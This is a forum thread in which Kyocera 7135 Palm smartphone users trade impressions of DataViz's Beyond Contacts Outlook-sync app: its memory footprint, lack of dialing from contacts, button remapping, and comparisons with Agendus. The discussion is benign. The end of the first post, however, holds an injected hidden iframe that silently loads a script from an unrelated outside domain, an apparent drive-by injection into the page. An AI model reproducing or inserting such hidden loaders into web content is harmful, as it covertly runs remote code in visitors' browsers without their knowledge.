+ Reply to Thread

Anyone tried Dataviz Beyond Contacts with 7135?

I'm getting loads of info in my inbox today about the new Beyond Contacts from DataViz, which syncs everything in Outlook to the the Palm. It has its own separate database to the built in PIM databases on the Palm, and a nice today screen, etc. I suspect, however, it won't help us 7135 users since it has a separate address book database which means we will no longer be able to use the quick dial and other phone related contact utilities. I've decided not to install the demo for now because I'd have to delete other stuff (the app takes a whopping 1.6 MB). But I'd love to hear from anyone else who has tried it out, and hear their impressions, especially about the contacts/dialing functionality.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Beyond Contacts -- Dream come true?

Ok, so has anyone else been looking at this product that DataViz released today? It's called Beyond Contacts

http://www.dataviz.com/products/beyo...cts/index.html

Simply put, it's a FULL Outlook client on your Palm PDA.

I haven't had a chance to check it out yet. I'm stuck at work, the cradle is at home, my office is the system I would install it on and I have to leave tomorrow for a trip so I won't be able to test it until next week. Arrrgghhh.

It looks really impressive.

Lot of work on this front too. I was pleased yesterday when I saw that Chapura was coming out with a similar product called KeySuite 2.0 (but there was never a 1.0 ). Except that KeySuite 2.0 doesn't include an e-mail component. But I can't help but think that Chapura got wind of the DataViz product release and came out with their announcement so as to not look like they are far behind (Chapura indicates that their product will be ready in the summer).

Anyway, folks like me who LIVE on Outlook might find this very handy. The only negatives I can see immediately are that it can only be used to sync to ONE computer and they clearly state that in the FAQ. Also, like KeyContacts, it does not use the native Palm databases. It's not like you can't keep them all in there (Palm DBs and DataViz DBs). But it will take up more room.

The real question is whether there is any kind of unique SmartPhone functionality. I doubt it myself. But I don't know.

I have to admit that I think this type of product is LONG overdue. I can't wait to mess with it..... next week.

Woops

Looks like I'm a dumbass and didn't see that Jeremy had already posted a thread on this. Sorry about that. I try not to make redundant threads. If a moderator can merge this into Jeremy's, it would be appreciated... thanks.

Re: Woops

Originally posted by SteveNYC
    If a moderator can merge this into Jeremy's, it would be appreciated... thanks.
    Done (now don't let it happen again! :p ).

This does look like an interesting app! I would like to see what it can do on my 7135... if I can fit it! I definitely would like to hear feedback from people who do give it a try
    Please visit my picture site: Robert-O-Rama :)

Inbox is optional

Well, I'm installing it now just to mess around with and the first thing that it offers as an option is to exclude the e-mail component of Beyond Contacts if you wish. I guess this is for people who prefer to use some other E-Mail client. This seems to be a reasonable idea. Lots of people may find that Snappermail (or any number of other applications) is a superior e-mail application.

Having used it briefly (don't you just love these 5 minute expert reviews ) I've seen the following:

*It takes a few seconds to populate the initial "Today" screen. Maybe three seconds or so.

**EDIT: WRONG**
    *You can re-task the BC app to the Calendar hard-button (or any other for that matter) but you can't, for example, re-task the Address Book hard-button to the contacts component of BC. Not a big deal to me, but others will consider it worth crying about .

*There is no auto-dialing when you select a contacts phone number and then press the SEND button.

*It did disable the sync of Chapura PocketMirror that I had. I don't know if it would cause a problem if I re-enabled it. I can't think of why it would cause a problem, but it is possible I guess.

So far, so good. In part two of my ten-minute review, I comment on the colors (j/k)

Woooppss, this is why proper reviewers have Editors behind them!

I was wrong, it looks like it automatically re-tasks the two hard-buttons for Calendar and Address Book to the appropriate BC components. If you want, you can re-task one of the hard-buttons so that it brings up the BC "Today" screen instead. That's what I should have said.

I'm Sticking with Agendus

I tried our Beyond Contacts for about 5 minutes and un-installed it.

Negatives:
    - Takes up way to much memory on the handheld. (Over 2M when all is populated)
    - No tapping on a contact in a ToDo or Meeting and getting the contact info directly.
    - Not able to dial out of the app.

Agendus is compact, lets you map a contact directly into a ToDo or Meeting, and then view the contact info without switching apps.

Be interested in what everyone else thinks.
    Mark
    ==========================
    Palm Personal > Palm V > Palm Vx > Clie 760 > Kyocera 7135 > Treo 600 >Treo 650 > (Maybe i730??)

mdlissner--

I use Docs2Go along with Inbox2Go and so was sent a special 29.95 intro offer. I installed the trial version today and like you uninstalled it within 5 minutes literally! The inability to initiate the dialer app when clicking on a contact phone number sealed it for me. Other than the additional sync fields in the contact area i didn't see much added value

Can't we use both?

I haven't had a chance to try out this particular idea yet because I'm not at home to test, but can't we continue to use both the Datebook and Address apps alongside Beyond Contacts?

It should be able to operate just like KeyContacts did. You can sync both. Yes, it takes up more room and is duplicative to some extent, but then you get the best of both worlds. I guess it really depends on how much you need (or in my case, rely on) functionality with Outlook.

I agree, there are already a few things that I would like to see in Beyond Contacts. It certainly has no specific functionality geared towards smartphone users like us. But looking at it as the PDA app that it is, I find it to be an outstanding program.

But if I were looking for a wholesale replacement app for the existing datebook and calendar apps, then no, this definately is NOT the ticket. At least, not yet. Just a few more tweaks to add smartphone features and this could be a killer app.

Two suggestions so far:

* Allow for dialing of contacts when the phone number is selected.
    * Allow individual selecting when the OK button is pressed in the Contacts screen. KeyContacts on my Handera 330 worked fantastic in this manner (Scoll up or down moved at a page per click, but one you clicked the jog wheel IN (OK), it would move up or down one contact at a time. Another OK would bring up that individual record.)

For me though, Beyond Contacts is awesome.

Also, I like the fact that when I hold the Datebook hard button down for a few seconds, it brings up the "Outlook Today" view.

Over all, NICE!